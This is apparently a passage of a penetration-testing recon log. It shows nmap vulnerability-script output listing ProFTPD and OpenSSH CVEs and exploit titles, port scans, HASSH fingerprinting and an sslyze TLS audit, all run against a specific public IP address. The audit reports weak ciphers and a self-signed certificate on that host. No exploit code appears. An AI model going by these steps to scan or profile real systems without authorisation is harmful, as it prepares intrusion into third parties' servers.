| [16878] ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)
| [16851] ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)
| [15662] ProFTPD 1.3.3c compromised source remote root Trojan
| [20690] wu-ftpd 2.4/2.5/2.6,Trolltech ftpd 1.2,ProFTPD 1.2,BeroFTPD 1.3.4 FTP
glob Expansion Vulnerability
| [16852] ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)
| [10044] ProFTPd 1.3.0 mod_ctrls Local Stack Overflow (opensuse)
| [3730] ProFTPD 1.3.0/1.3.0a (mod_ctrls) Local Overflow Exploit (exec-shield)
| [3333] ProFTPD 1.3.0/1.3.0a (mod_ctrls support) Local Buffer Overflow Exploit 2
| [3330] ProFTPD 1.3.0/1.3.0a (mod_ctrls support) Local Buffer Overflow Exploit
| [2928] ProFTPD <= 1.3.0a (mod_ctrls support) Local Buffer Overflow PoC
| [2856] ProFTPD 1.3.0 (sreplace) Remote Stack Overflow Exploit (meta)
|
Vulnerability
| [63497] Debian Security Advisory DSA 1730-1 (proftpd-dfsg)
|
| [1028040] ProFTPD MKD/XMKD Race Condition Lets Local Users Gain Elevated
Privileges
| [1026321] ProFTPD Use-After-Free Memory Error Lets Remote Authenticated Users
Execute Arbitrary Code
| [1020945] ProFTPD Request Processing Bug Permits Cross-Site Request Forgery
Attacks
| [1017931] ProFTPD Auth API State Error May Let Remote Users Access the System in
Certain Cases
| [1017167] ProFTPD sreplace() Off-by-one Bug Lets Remote Users Execute Arbitrary
Code
| [1012488] ProFTPD SITE CHGRP Command Lets Remote Authenticated Users Modify
File/Directory Group Ownership
| [1011687] ProFTPd Login Timing Differences Disclose Valid User Account Names to
Remote Users
| [1009997] ProFTPD Access Control Bug With CIDR Addresses May Let Remote
Authenticated Users Access Files
| [1009297] ProFTPD _xlate_ascii_write() Off-By-One Buffer Overflows Let Remote
Users Execute Arbitrary Code With Root Privileges
| [1007794] ProFTPD ASCII Mode File Upload Buffer Overflow Lets Certain Remote
| [1007020] ProFTPD Input Validation Flaw When Authenticating Against Postgresql
Using 'mod_sql' Lets Remote Users Gain Access
| [1003019] ProFTPD FTP Server May Allow Local Users to Execute Code on the Server
| [1002354] ProFTPD Reverse DNS Feature Fails to Check Forward-to-Reverse DNS
Mappings
| [1002148] ProFTPD Site and Quote Commands May Allow Remote Users to Execute
Arbitrary Commands on the Server
|
| [89051] ProFTPD Multiple FTP Command Handling Symlink Arbitrary File Overwrite
| [77004] ProFTPD Use-After-Free Response Pool Allocation List Parsing Remote
Memory Corruption
| [70868] ProFTPD mod_sftp Component SSH Payload DoS
| [70782] ProFTPD contrib/mod_sql.c sql_prepare_where Function Crafted Username
Handling Remote Overflow
| [69562] ProFTPD on ftp.proftpd.org Compromised Source Packages Trojaned
Distribution
| [69200] ProFTPD pr_data_xfer Function ABOR Command Remote DoS
| [68988] ProFTPD mod_site_misc Module Multiple Command Traversal Arbitrary File
Manipulation
| [68985] ProFTPD netio.c pr_netio_telnet_gets Function TELNET_IAC Escape Sequence
Remote Overflow
| [59292] ProFTPD mod_tls Module Certificate Authority (CA) subjectAltName Field
Null Byte Handling SSL MiTM Weakness
| [57311] ProFTPD contrib/mod_ratio.c Multiple Unspecified Buffer Handling Issues
| [57310] ProFTPD Multiple Unspecified Overflows
| [57309] ProFTPD src/support.c Unspecified Buffer Handling Issue
| [57308] ProFTPD modules/mod_core.c Multiple Unspecified Overflows
| [57307] ProFTPD Multiple Modules Unspecified Overflows
| [57306] ProFTPD contrib/mod_pam.c Multiple Unspecified Buffer Handling Issues
| [57305] ProFTPD src/main.c Unspecified Overflow
| [57304] ProFTPD src/log.c Logfile Handling Unspecified Race Condition
| [57303] ProFTPD modules/mod_auth.c Unspecified Issue
| [51954] ProFTPD Server NLS Support mod_sql_* Encoded Multibyte Character SQL
Injection Protection Bypass
| [51953] ProFTPD Server mod_sql username % Character Handling SQL Injection
| [51849] ProFTPD Character Encoding SQL Injection
| [51720] ProFTPD NLST Command Argument Handling Remote Overflow
| [51719] ProFTPD MKDIR Command Directory Name Handling Remote Overflow
| [48411] ProFTPD FTP Command Truncation CSRF
| [34602] ProFTPD Auth API Multiple Auth Module Authentication Bypass
| [31509] ProFTPD mod_ctrls Module pr_ctrls_recv_request Function Local Overflow
| [30719] mod_tls Module for ProFTPD tls_x509_name_oneline Function Remote Overflow
| [30660] ProFTPD CommandBufferSize Option cmd_loop() Function DoS
| [30267] ProFTPD src/support.c sreplace() Function Remote Overflow
| [23063] ProFTPD mod_radius Password Overflow DoS
| [20212] ProFTPD Host Reverse Resolution Failure ACL Bypass
| [18271] ProFTPD mod_sql SQLShowInfo Directive Format String
| [18270] ProFTPD ftpshut Shutdown Message Format String
| [14012] GProftpd gprostats Utility Log Parser Remote Format String
| [10769] ProFTPD File Transfer Newline Character Overflow
| [10768] ProFTPD STAT Command Remote DoS
| [10758] ProFTPD Login Timing Account Name Enumeration
| [10173] ProFTPD mod_sqlpw wtmp Authentication Credential Disclosure
| [9507] PostgreSQL Authentication Module (mod_sql) for ProFTPD USER Name Parameter
SQL Injection
| [9163] ProFTPD MKDIR Directory Creation / Change Remote Overflow (palmetto)
| [7166] ProFTPD SIZE Command Memory Leak Remote DoS
| [7165] ProFTPD USER Command Memory Leak DoS
| [5744] ProFTPD CIDR IP Subnet ACL Bypass
| [5705] ProFTPD Malformed cwd Command Format String
| [5638] ProFTPD on Debian Linux postinst Installation Privilege Escalation
| [4134] ProFTPD in_xlate_ascii_write() Function RETR Command Remote Overflow
| [144] ProFTPD src/log.c log_xfer() Function Remote Overflow
|_

root@blackbox:/usr/share/nmap/scripts# nmap --script nmap-vulners,vulscan --script-

args vulscandb -sV -p22 184.154.192.250

| vulners:
| cpe:/a:openbsd:openssh:4.3:
| CVE-2006-5051 9.3 https://vulners.com/cve/CVE-2006-5051
|_ CVE-2008-3259 1.2 https://vulners.com/cve/CVE-2008-3259
| [44077] OpenBSD OpenSSH up to 4.3 Signal denial of service
| [39331] OpenSSH 4.3p2 Audit Log linux_audit_record_event unknown vulnerability
| [43307] OpenSSH 4.0 unknown vulnerability
| [36382] OpenBSD OpenSSH up to 4.6 information disclosure
| [32699] OpenBSD OpenSSH 4.1 denial of service
| [2667] OpenBSD OpenSSH 4.4 Separation Monitor unknown vulnerability
|
| [CVE-2009-2904] A certain Red Hat modification to the ChrootDirectory feature in
OpenSSH 4.8, as used in sshd in OpenSSH 4.3 in Red Hat Enterprise Linux (RHEL) 5.4
and Fedora 11, allows local users to gain privileges via hard links to setuid
programs that use configuration files within the chroot directory, related to
requirements for directory ownership.
| [CVE-2008-4109] A certain Debian patch for OpenSSH before 4.3p2-9etch3 on etch
| [CVE-2008-1483] OpenSSH 4.3p2, and probably other versions, allows local users to
hijack forwarded X connections by causing ssh to set DISPLAY to :10, even when
another process is listening on the associated port, as demonstrated by opening TCP
port 6010 (IPv4) and sniffing a cookie sent by Emacs.
| [CVE-2007-3102] Unspecified vulnerability in the linux_audit_record_event
function in OpenSSH 4.3p2, as used on Fedora Core 6 and possibly other systems,
allows remote attackers to write arbitrary characters to an audit log via a crafted
username. NOTE: some of these details are obtained from third party information.
| [CVE-2010-4755] The (1) remote_glob function in sftp-glob.c and the (2)
process_put function in sftp.c in OpenSSH 5.8 and earlier, as used in FreeBSD 7.3
and 8.1, NetBSD 5.0.2, OpenBSD 4.7, and other products, allow remote authenticated
users to cause a denial of service (CPU and memory consumption) via crafted glob
expressions that do not match any pathnames, as demonstrated by glob expressions in
SSH_FXP_STAT requests to an sftp daemon, a different vulnerability than CVE-2010-
2632.
| [CVE-2008-3844] Certain Red Hat Enterprise Linux (RHEL) 4 and 5 packages for
OpenSSH, as signed in August 2008 using a legitimate Red Hat GPG key, contain an
externally introduced modification (Trojan Horse) that allows the package authors
to have an unknown impact. NOTE: since the malicious packages were not distributed
from any official Red Hat sources, the scope of this issue is restricted to users
who may have obtained these packages through unofficial distribution points. As of
20080827, no unofficial distributions of this software are known.
| [CVE-2008-3234] sshd in OpenSSH 4 on Debian GNU/Linux, and the 20070303 OpenSSH
snapshot, allows remote authenticated users to obtain access to arbitrary SELinux
roles by appending a :/ (colon slash) sequence, followed by the role name, to the
username.
| [CVE-2008-1657] OpenSSH 4.4 up to versions before 4.9 allows remote authenticated
users to bypass the sshd_config ForceCommand directive by modifying the .ssh/rc
session file.
| [CVE-2007-6415] scponly 4.6 and earlier allows remote authenticated users to
bypass intended restrictions and execute arbitrary code by invoking scp, as
implemented by OpenSSH, with the -F and -o options.
| [CVE-2007-4752] ssh in OpenSSH before 4.7 does not properly handle when an
untrusted cookie cannot be created and uses a trusted X11 cookie instead, which
allows attackers to violate intended policy and gain privileges by causing an X
client to be treated as trusted.
| [CVE-2007-2243] OpenSSH 4.6 and earlier, when ChallengeResponseAuthentication is
enabled, allows remote attackers to determine the existence of user accounts by
attempting to authenticate via S/KEY, which displays a different response if the
user account exists, a similar issue to CVE-2001-1483.
| [CVE-2006-5794] Unspecified vulnerability in the sshd Privilege Separation
Monitor in OpenSSH before 4.5 causes weaker verification that authentication has
been successful, which might allow attackers to bypass authentication. NOTE: as of
20061108, it is believed that this issue is only exploitable by leveraging
vulnerabilities in the unprivileged process, which are not known to exist.
| [CVE-2006-5229] OpenSSH portable 4.1 on SUSE Linux, and possibly other platforms
and versions, and possibly under limited configurations, allows remote attackers to
determine valid usernames via timing discrepancies in which responses take longer
for valid usernames than invalid ones, as demonstrated by sshtime. NOTE: as of
20061014, it appears that this issue is dependent on the use of manually-set
passwords that causes delays when processing /etc/shadow due to an increased number
of rounds.
| [CVE-2006-5052] Unspecified vulnerability in portable OpenSSH before 4.4, when
running on some platforms, allows remote attackers to determine the validity of
usernames via unknown vectors involving a GSSAPI "authentication abort."
| [CVE-2006-5051] Signal handler race condition in OpenSSH before 4.4 allows remote
attackers to cause a denial of service (crash), and possibly execute arbitrary code
if GSSAPI authentication is enabled, via unspecified vectors that lead to a double-
free.
| [CVE-2006-4924] sshd in OpenSSH before 4.4, when using the version 1 SSH
protocol, allows remote attackers to cause a denial of service (CPU consumption)
via an SSH packet that contains duplicate blocks, which is not properly handled by
the CRC compensation attack detector.
| [CVE-2006-0225] scp in OpenSSH 4.2p1 allows attackers to execute arbitrary
commands via filenames that contain shell metacharacters or spaces, which are
expanded twice.
| [CVE-2005-2798] sshd in OpenSSH before 4.2, when GSSAPIDelegateCredentials is
enabled, allows GSSAPI credentials to be delegated to clients who log in using non-
GSSAPI methods, which could cause those credentials to be exposed to untrusted
users or hosts.
| [CVE-2005-2797] OpenSSH 4.0, and other versions before 4.2, does not properly
handle dynamic port forwarding ("-D" option) when a listen address is not provided,
which may cause OpenSSH to enable the GatewayPorts functionality.
| [CVE-2005-2666] SSH, as implemented in OpenSSH before 4.0 and possibly other
implementations, stores hostnames, IP addresses, and keys in plaintext in the
known_hosts file, which makes it easier for an attacker that has compromised an SSH
user's account to generate a list of additional targets that are more likely to
have the same password or key.
| [CVE-2001-1029] libutil in OpenSSH on FreeBSD 4.4 and earlier does not drop
privileges before verifying the capabilities for reading the copyright and welcome
files, which allows local users to bypass the capabilities checks and read
arbitrary files by specifying alternate copyright or welcome files.
|
| [4560] OpenSSH Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability
|
| [8896] OpenSSH Kerberos 4 TGT/AFS buffer overflow
|
| [2444] OpenSSH <= 4.3 p1 (Duplicated Block) Remote Denial of Service Exploit
| [21402] OpenSSH 2.x/3.x Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability
| [3303] Portable OpenSSH <= 3.6.1p-PAM / 4.1-SUSE Timing Attack Exploit
|
| [902488] OpenSSH 'sshd' GSSAPI Credential Disclosure Vulnerability
| [881183] CentOS Update for openssh CESA-2012:0884 centos6
| [840259] Ubuntu Update for openssh vulnerabilities USN-649-1
| [830317] Mandriva Update for openssh-askpass-qt MDKA-2007:127 (openssh-askpass-
qt)
| [830191] Mandriva Update for openssh MDKSA-2007:236 (openssh)
| [802407] OpenSSH 'sshd' Challenge Response Authentication Buffer Overflow
Vulnerability
| [103503] openssh-server Forced Command Handling Information Disclosure
Vulnerability
| [103247] OpenSSH Ciphersuite Specification Information Disclosure Weakness
| [103064] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability
| [100584] OpenSSH X Connections Session Hijacking Vulnerability
| [65169] SLES9: Security update for openssh,openssh-askpass
| [57585] Debian Security Advisory DSA 1212-1 (openssh (1:3.8.1p1-8.sarge.6))
| [57483] Debian Security Advisory DSA 1189-1 (openssh-krb5)
| [57470] FreeBSD Ports: openssh
| [56330] Gentoo Security Advisory GLSA 200602-11 (OpenSSH)
| [53964] Slackware Advisory SSA:2003-266-01 New OpenSSH packages
| [53885] Slackware Advisory SSA:2003-259-01 OpenSSH Security Advisory
| [53884] Slackware Advisory SSA:2003-260-01 OpenSSH updated again
| [11343] OpenSSH Client Unauthorized Remote Forwarding
| [10954] OpenSSH AFS/Kerberos ticket/token passing
| [10883] OpenSSH Channel Code Off by 1
| [10823] OpenSSH UseLogin Environment Variables
|
| [1028187] OpenSSH pam_ssh_agent_auth Module on Red Hat Enterprise Linux Lets
Remote Users Execute Arbitrary Code
| [1026593] OpenSSH Lets Remote Authenticated Users Obtain Potentially Sensitive
Information
| [1025739] OpenSSH on FreeBSD Has Buffer Overflow in pam_thread() That Lets Remote
| [1025482] OpenSSH ssh-keysign Utility Lets Local Users Gain Elevated Privileges
| [1025028] OpenSSH Legacy Certificates May Disclose Stack Contents to Remote Users
| [1022967] OpenSSH on Red Hat Enterprise Linux Lets Remote Authenticated Users
Gain Elevated Privileges
| [1021235] OpenSSH CBC Mode Error Handling May Let Certain Remote Users Obtain
Plain Text in Certain Cases
| [1020891] OpenSSH on Debian Lets Remote Users Prevent Logins
| [1020730] OpenSSH for Red Hat Enterprise Linux Packages May Have Been Compromised
| [1020537] OpenSSH on HP-UX Lets Local Users Hijack X11 Sessions
| [1019733] OpenSSH Unsafe Default Configuration May Let Local Users Execute
Arbitrary Commands
| [1019707] OpenSSH Lets Local Users Hijack Forwarded X Sessions in Certain Cases
| [1017756] Apple OpenSSH Key Generation Process Lets Remote Users Deny Service
| [1017183] OpenSSH Privilege Separation Monitor Validation Error May Cause the
Monitor to Fail to Properly Control the Unprivileged Process
| [1016940] OpenSSH Race Condition in Signal Handler Lets Remote Users Deny Service
and May Potentially Permit Code Execution
| [1016939] OpenSSH GSSAPI Authentication Abort Error Lets Remote Users Determine
Valid Usernames
| [1016931] OpenSSH SSH v1 CRC Attack Detection Implementation Lets Remote Users
Deny Service
| [1016672] OpenSSH on Mac OS X Lets Remote Users Deny Service
| [1015706] OpenSSH Interaction With OpenPAM Lets Remote Users Deny Service
| [1015540] OpenSSH scp Double Shell Character Expansion During Local-to-Local
Copying May Let Local Users Gain Elevated Privileges in Certain Cases
| [1014845] OpenSSH May Unexpectedly Activate GatewayPorts and Also May Disclose
GSSAPI Credentials in Certain Cases
| [1011193] OpenSSH scp Directory Traversal Flaw Lets Remote SSH Servers Overwrite
Files in Certain Cases
| [1011143] OpenSSH Default Configuration May Be Unsafe When Used With Anonymous
SSH Services
| [1007791] Portable OpenSSH PAM free() Bug May Let Remote Users Execute Root Code
| [1007716] OpenSSH buffer_append_space() and Other Buffer Management Errors May
Let Remote Users Execute Arbitrary Code
| [1006926] OpenSSH Host Access Restrictions Can Be Bypassed By Remote Users
| [1006688] OpenSSH Timing Flaw With Pluggable Authentication Modules Can Disclose
Valid User Account Names to Remote Users
| [1004818] OpenSSH's Secure Shell (SSH) Implementation Weakness May Disclose User
Passwords to Remote Users During Man-in-the-Middle Attacks
| [1004616] OpenSSH Integer Overflow and Buffer Overflow May Allow Remote Users to
Gain Root Access to the System
| [1004391] OpenSSH 'BSD_AUTH' Access Control Bug May Allow Unauthorized Remote
Users to Authenticated to the System
| [1004115] OpenSSH Buffer Overflow in Kerberos Ticket and AFS Token Processing
Lets Local Users Execute Arbitrary Code With Root Level Permissions
| [1003758] OpenSSH Off-by-one 'Channels' Bug May Let Authorized Remote Users
Execute Arbitrary Code with Root Privileges
| [1002895] OpenSSH UseLogin Environment Variable Bug Lets Local Users Execute
Commands and Gain Root Access
| [1002748] OpenSSH 3.0 Denial of Service Condition May Allow Remote Users to Crash
the sshd Daemon and KerberosV Configuration Error May Allow Remote Users to
Partially Authenticate When Authentication Should Not Be Permitted
| [1002734] OpenSSH's S/Key Implementation Information Disclosure Flaw Provides
Remote Users With Information About Valid User Accounts
| [1002455] OpenSSH May Fail to Properly Restrict IP Addresses in Certain
Configurations
| [1002432] OpenSSH's Sftp-server Subsystem Lets Authorized Remote Users with
Restricted Keypairs Obtain Additional Access on the Server
| [1001683] OpenSSH Allows Authorized Users to Delete Other User Files Named
Cookies
|
| [92034] GSI-OpenSSH auth-pam.c Memory Management Authentication Bypass
| [90474] Red Hat / Fedora PAM Module for OpenSSH Incorrect error() Function
Calling Local Privilege Escalation
| [90007] OpenSSH logingracetime / maxstartup Threshold Connection Saturation
Remote DoS
| [81500] OpenSSH gss-serv.c ssh_gssapi_parse_ename Function Field Length Value
Parsing Remote DoS
| [78706] OpenSSH auth-options.c sshd auth_parse_options Function authorized_keys
Command Option Debug Message Information Disclosure
| [75753] OpenSSH PAM Module Aborted Conversation Local Information Disclosure
| [75249] OpenSSH sftp-glob.c remote_glob Function Glob Expression Parsing Remote
DoS
| [75248] OpenSSH sftp.c process_put Function Glob Expression Parsing Remote DoS
| [72183] Portable OpenSSH ssh-keysign ssh-rand-helper Utility File Descriptor Leak
Local Information Disclosure
| [70873] OpenSSH Legacy Certificates Stack Memory Disclosure
| [69658] OpenSSH J-PAKE Public Parameter Validation Shared Secret Authentication
Bypass
| [67743] Novell NetWare OpenSSH SSHD.NLM Absolute Path Handling Remote Overflow
| [59353] OpenSSH sshd Local TCP Redirection Connection Masking Weakness
| [58495] OpenSSH sshd ChrootDirectory Feature SetUID Hard Link Local Privilege
Escalation
| [56921] OpenSSH Unspecified Remote Compromise
| [53021] OpenSSH on ftp.openbsd.org Trojaned Distribution
| [50036] OpenSSH CBC Mode Chosen Ciphertext 32-bit Chunk Plaintext Context
Disclosure
| [49386] OpenSSH sshd TCP Connection State Remote Account Enumeration
| [48791] OpenSSH on Debian sshd Crafted Username Arbitrary Remote SELinux Role
Access
| [47635] OpenSSH Packages on Red Hat Enterprise Linux Compromised Distribution
| [47227] OpenSSH X11UseLocalhost X11 Forwarding Port Hijacking
| [45873] Cisco WebNS SSHield w/ OpenSSH Crafted Large Packet Remote DoS
| [43911] OpenSSH ~/.ssh/rc ForceCommand Bypass Arbitrary Command Execution
| [43745] OpenSSH X11 Forwarding Local Session Hijacking
| [43371] OpenSSH Trusted X11 Cookie Connection Policy Bypass
| [39214] OpenSSH linux_audit_record_event Crafted Username Audit Log Injection
| [37315] pam_usb OpenSSH Authentication Unspecified Issue
| [34850] OpenSSH on Mac OS X Key Generation Remote Connection DoS
| [34601] OPIE w/ OpenSSH Account Enumeration
| [34600] OpenSSH S/KEY Authentication Account Enumeration
| [32721] OpenSSH Username Password Complexity Account Enumeration
| [30232] OpenSSH Privilege Separation Monitor Weakness
| [29494] OpenSSH packet.c Invalid Protocol Sequence Remote DoS
| [29266] OpenSSH GSSAPI Authentication Abort Username Enumeration
| [29264] OpenSSH Signal Handler Pre-authentication Race Condition Code Execution
| [29152] OpenSSH Identical Block Packet DoS
| [27745] Apple Mac OS X OpenSSH Nonexistent Account Login Enumeration DoS
| [23797] OpenSSH with OpenPAM Connection Saturation Forked Process Saturation DoS
| [22692] OpenSSH scp Command Line Filename Processing Command Injection
| [20216] OpenSSH with KerberosV Remote Authentication Bypass
| [19142] OpenSSH Multiple X11 Channel Forwarding Leaks
| [19141] OpenSSH GSSAPIAuthentication Credential Escalation
| [18236] OpenSSH no pty Command Execution Local PAM Restriction Bypass
| [16567] OpenSSH Privilege Separation LoginGraceTime DoS
| [16039] Solaris 108994 Series Patch OpenSSH LDAP Client Authentication DoS
| [9562] OpenSSH Default Configuration Anon SSH Service Port Bounce Weakness
| [9550] OpenSSH scp Traversal Arbitrary File Overwrite
| [6601] OpenSSH *realloc() Unspecified Memory Errors
| [6245] OpenSSH SKEY/BSD_AUTH Challenge-Response Remote Overflow
| [6073] OpenSSH on FreeBSD libutil Arbitrary File Read
| [6072] OpenSSH PAM Conversation Function Stack Modification
| [6071] OpenSSH SSHv1 PAM Challenge-Response Authentication Privilege Escalation
| [5536] OpenSSH sftp-server Restricted Keypair Restriction Bypass
| [5408] OpenSSH echo simulation Information Disclosure
| [5113] OpenSSH NIS YP Netgroups Authentication Bypass
| [4536] OpenSSH Portable AIX linker Privilege Escalation
| [3938] OpenSSL and OpenSSH /dev/random Check Failure
| [3456] OpenSSH buffer_append_space() Heap Corruption
| [2557] OpenSSH Multiple Buffer Management Multiple Overflows
| [2140] OpenSSH w/ PAM Username Validity Timing Attack
| [2112] OpenSSH Reverse DNS Lookup Bypass
| [2109] OpenSSH sshd Root Login Timing Side-Channel Weakness
| [1853] OpenSSH Symbolic Link 'cookies' File Removal
| [839] OpenSSH PAMAuthenticationViaKbdInt Challenge-Response Remote Overflow
| [781] OpenSSH Kerberos TGT/AFS Token Passing Remote Overflow
| [730] OpenSSH Channel Code Off by One Remote Privilege Escalation
| [688] OpenSSH UseLogin Environment Variable Local Command Execution
| [642] OpenSSH Multiple Key Type ACL Bypass
| [504] OpenSSH SSHv2 Public Key Authentication Bypass
| [341] OpenSSH UseLogin Local Privilege Escalation
|_

root@blackbox:/usr/share/nmap/scripts# nmap --script vuln -p80 184.154.192.250

Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
root@blackbox:/usr/share/nmap/scripts# nmap --script vuln -p443 184.154.192.250

Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
root@blackbox:/usr/share/nmap/scripts# nmap --script ssh-hassh.nse -p 22

184.154.192.250 --open
PORT STATE SERVICE

22/tcp open ssh
root@blackbox:~# git clone https://github.com/0x4D31/hassh-utils.git

root@blackbox:~# cd hassh-utils/
root@blackbox:/usr/share/nmap/scripts# nmap --script ssh-hassh.nse --script-args

database=hasshd 184.154.192.250 22
Not shown: 981 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
53/tcp open domain
80/tcp open http
106/tcp open pop3pw
110/tcp open pop3
111/tcp open rpcbind
143/tcp open imap
161/tcp filtered snmp
443/tcp open https
465/tcp open smtps
554/tcp open rtsp
587/tcp open submission
993/tcp open imaps
995/tcp open pop3s
3306/tcp open mysql
7070/tcp open realserver
8443/tcp open https-alt
Nmap done: 2 IP addresses (1 host up) scanned in 15.66 seconds
root@blackbox:/usr/share/nmap/scripts# nmap --script ssh-hassh.nse --script-args

client_string=SSH-2.0-asdf -p 22 184.154.192.250
PORT STATE SERVICE

22/tcp open ssh
root@blackbox:/usr/share/nmap/scripts# nmap -oN scan.nmap -v -sS -sU -T5 --top-

ports 1000 184.154.192.250
Discovered open port 111/udp on 184.154.192.250
Not shown: 1115 closed ports, 865 open|filtered ports

PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
53/tcp open domain
80/tcp open http
106/tcp open pop3pw
110/tcp open pop3
111/tcp open rpcbind
143/tcp open imap
161/tcp filtered snmp
443/tcp open https
465/tcp open smtps
554/tcp open rtsp
587/tcp open submission
993/tcp open imaps
995/tcp open pop3s
3306/tcp open mysql
7070/tcp open realserver
8443/tcp open https-alt
111/udp open rpcbind
root@blackbox:/usr/share/nmap/scripts# nmap -oN vulners.nmap -sV --version-

intensity 9 --script vulners -p 80 184.154.192.250

80/tcp open http Apache httpd (PleskLin)
|_http-server-header: Apache

root@blackbox:/usr/share/nmap/scripts# nmap -oN vulners.nmap -sV --version-
intensity 9 --script vulners -p 22 184.154.192.250


root@blackbox:/usr/share/nmap/scripts# nmap --script ssh-hassh.nse -p 22 --open -Pn

184.154.192.250 -oX test.xml -vv
root@blackbox:/usr/share/nmap/scripts# nmap --script ssh-hassh.nse -p 22

184.154.192.250
PORT STATE SERVICE

22/tcp open ssh
EXPLAIN SHELL
https://explainshell.com/explain?cmd=nmap+-sC+-sV+-v++-oN
SSL SCAN USING SSLYZE
root@blackbox:/usr/share/nmap/scripts# sslyze --regular 184.154.192.250:443
AVAILABLE PLUGINS
-----------------
HttpHeadersPlugin
SessionRenegotiationPlugin
CertificateInfoPlugin
SessionResumptionPlugin
FallbackScsvPlugin
OpenSslCcsInjectionPlugin
CompressionPlugin
RobotPlugin
HeartbleedPlugin
OpenSslCipherSuitesPlugin
CHECKING HOST(S) AVAILABILITY

-----------------------------
184.154.192.250:443 => 184.154.192.250
SCAN RESULTS FOR 184.154.192.250:443 - 184.154.192.250

------------------------------------------------------
* TLSV1_3 Cipher Suites:

Server rejected all cipher suites.
* Downgrade Attacks:
TLS_FALLBACK_SCSV: VULNERABLE - Signaling cipher suite not
supported
* Session Renegotiation:
Client-initiated Renegotiation: OK - Rejected
Secure Renegotiation: VULNERABLE - Secure renegotiation not
supported
* OpenSSL CCS Injection:

OK - Not vulnerable to OpenSSL CCS
injection
* Deflate Compression:
VULNERABLE - Server supports Deflate
compression
* Resumption Support:
With Session IDs: OK - Supported (5 successful, 0 failed, 0
errors, 5 total attempts).
With TLS Tickets: OK - Supported

* ROBOT Attack:
OK - Not vulnerable
* SSLV3 Cipher Suites:

Forward Secrecy OK - Supported
RC4 INSECURE - Supported
Preferred:
None - Server followed client cipher suite preference.
Accepted:
TLS_DHE_RSA_WITH_AES_256_CBC_SHA DH-1024 bits 256 bits
HTTP 200 OK
TLS_RSA_WITH_AES_256_CBC_SHA - 256 bits
HTTP 200 OK
HTTP 200 OK
HTTP 200 OK
TLS_RSA_WITH_RC4_128_MD5 - 128 bits
HTTP 200 OK
TLS_RSA_WITH_RC4_128_SHA - 128 bits
HTTP 200 OK
TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA DH-1024 bits 112 bits
HTTP 200 OK
TLS_RSA_WITH_3DES_EDE_CBC_SHA - 112 bits
HTTP 200 OK
TLS_DHE_RSA_WITH_DES_CBC_SHA DH-1024 bits 56 bits
HTTP 200 OK
TLS_RSA_WITH_DES_CBC_SHA - 56 bits
HTTP 200 OK
TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA DH-512 bits 40 bits
HTTP 200 OK
TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5 - 40 bits
HTTP 200 OK
TLS_RSA_EXPORT_WITH_DES40_CBC_SHA - 40 bits
HTTP 200 OK
TLS_RSA_EXPORT_WITH_RC4_40_MD5 - 40 bits
HTTP 200 OK
* SSLV2 Cipher Suites:

Forward Secrecy INSECURE - Not Supported
Preferred:
Accepted:
SSL_CK_RC2_128_CBC_WITH_MD5 - 128 bits
HTTP 200 OK
SSL_CK_RC4_128_WITH_MD5 - 128 bits
HTTP 200 OK
SSL_CK_DES_192_EDE3_CBC_WITH_MD5 - 112 bits
HTTP 200 OK
SSL_CK_DES_64_CBC_WITH_MD5 - 56 bits
HTTP 200 OK
SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD5 - 40 bits
HTTP 200 OK
SSL_CK_RC4_128_EXPORT40_WITH_MD5 - 40 bits
HTTP 200 OK
* Certificate Information:
Content
SHA1 Fingerprint: 3f12da575e9a2e4cdc624a2c64f2b3d9e8fea274
Common Name: Parallels Panel
Issuer: Parallels Panel
Serial Number: 1315993919
Not Before: 2011-09-14 09:51:59
Not After: 2012-09-13 09:51:59
Signature Algorithm: sha1
Public Key Algorithm: RSA
Key Size: 2048
Exponent: 65537 (0x10001)
DNS Subject Alternative Names: []
Trust
Hostname Validation: FAILED - Certificate does NOT match
184.154.192.250
Android CA Store (8.1.0_r9): FAILED - Certificate is NOT Trusted: self
signed certificate
iOS CA Store (11): FAILED - Certificate is NOT Trusted: self
signed certificate
Java CA Store (jre-10.0.2): FAILED - Certificate is NOT Trusted: self
signed certificate
macOS CA Store (High Sierra): FAILED - Certificate is NOT Trusted: self
signed certificate
Mozilla CA Store (2018-04-12): FAILED - Certificate is NOT Trusted: self
signed certificate
Windows CA Store (2018-06-30): FAILED - Certificate is NOT Trusted: self
signed certificate
Symantec 2018 Deprecation: OK - Not a Symantec-issued certificate
Received Chain: Parallels Panel
Verified Chain: ERROR - Could not build verified chain
(certificate untrusted?)
Received Chain Contains Anchor: ERROR - Could not build verified chain
Received Chain Order: OK - Order is valid
Verified Chain contains SHA1: ERROR - Could not build verified chain
Extensions
OCSP Must-Staple: NOT SUPPORTED - Extension not found
Certificate Transparency: NOT SUPPORTED - Extension not found
OCSP Stapling
NOT SUPPORTED - Server did not send back
an OCSP response
* OpenSSL Heartbleed:
OK - Not vulnerable to Heartbleed

* TLSV1 Cipher Suites:

Forward Secrecy OK - Supported
Preferred:
Accepted:
HTTP 200 OK
HTTP 200 OK
HTTP 200 OK
HTTP 200 OK
TLS_RSA_WITH_RC4_128_SHA - 128 bits
HTTP 200 OK
TLS_RSA_WITH_RC4_128_MD5 - 128 bits
HTTP 200 OK
TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA DH-1024 bits 112 bits
HTTP 200 OK
TLS_RSA_WITH_3DES_EDE_CBC_SHA - 112 bits
HTTP 200 OK
TLS_DHE_RSA_WITH_DES_CBC_SHA DH-1024 bits 56 bits
HTTP 200 OK
TLS_RSA_WITH_DES_CBC_SHA - 56 bits
HTTP 200 OK
